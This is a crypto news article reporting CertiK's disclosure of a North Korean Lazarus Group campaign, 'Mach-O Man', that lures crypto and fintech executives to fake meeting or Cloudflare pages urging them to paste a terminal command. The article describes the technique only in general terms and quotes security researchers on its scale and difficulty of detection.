The campaign uses a technique called ClickFix to gain entry into corporate systems.
Crypto News
North Korea's Lazarus Group is running a new cyberattack campaign targeting executives at crypto and fintech firms. Security researchers at CertiK disclosed the operation on Wednesday and named it "Mach-O Man."
The campaign uses a technique called ClickFix to gain entry into corporate systems. Attackers send targets an urgent meeting invitation over Telegram, directing them to what appears to be a standard Zoom, Microsoft Teams, or Google Meet link. The page that loads is fake. It instructs the user to paste a terminal command to fix a supposed connection problem. Doing so gives attackers immediate access to the victim's corporate systems, SaaS platforms, and financial accounts.
Natalie Newson, a senior blockchain security researcher at CertiK, told CoinDesk the malware is built from native Mach-O binaries designed specifically for Apple environments. It was developed by the Chollima division inside Lazarus Group. The kit is modular, and other criminal groups have already begun using it outside of the original Lazarus campaigns.
Newson said the attack is difficult to intercept because the victim completes the final step themselves. The page looks legitimate, the instructions appear routine, and standard security controls are not designed to catch a user running a command they chose to paste. By the time any breach is discovered, the malware has typically deleted itself.
Security researcher Vladimir S. noted on X that variations of Mach-O Man have already been used to hijack DeFi project domains. In those cases, attackers replaced legitimate websites with fake Cloudflare verification pages asking visitors to run a terminal command as part of a routine security check.
Mauro Eldritch, founder of threat intelligence firm BCA Ltd., said the method is simple in execution and hard to stop because it relies entirely on the target's own action rather than a technical vulnerability.
Lazarus Group has accumulated an estimated $6.7 billion in stolen funds since 2017. Within the past month alone, the group has been linked to exploits at Drift and KelpDAO that drained more than $500 million combined. Newson said the pace of activity makes Lazarus more comparable to a state-run financial operation than a conventional hacking group.
"This isn't random hacking," Newson said. "It's a state-directed financial operation running at a scale and speed typical of institutions." She said the crypto industry needs to treat Lazarus the way banks treat nation-state cyber actors, as a constant and well-funded threat operating on an institutional timeline.
This article contains links to third-party websites or other content for information purposes only (“Third-Party Sites”). The Third-Party Sites are not under the control of CoinMarketCap, and CoinMarketCap is not responsible for the content of any Third-Party Site, including without limitation any link contained in a Third-Party Site, or any changes or updates to a Third-Party Site. CoinMarketCap is providing these links to you only as a convenience, and the inclusion of any link does not imply endorsement, approval or recommendation by CoinMarketCap of the site or any association with its operators. This article is intended to be used and must be used for informational purposes only. It is important to do your own research and analysis before making any material decisions related to any of the products or services described. This article is not intended as, and shall not be construed as, financial advice. The views and opinions expressed in this article are the author’s [company’s] own and do not necessarily reflect those of CoinMarketCap.
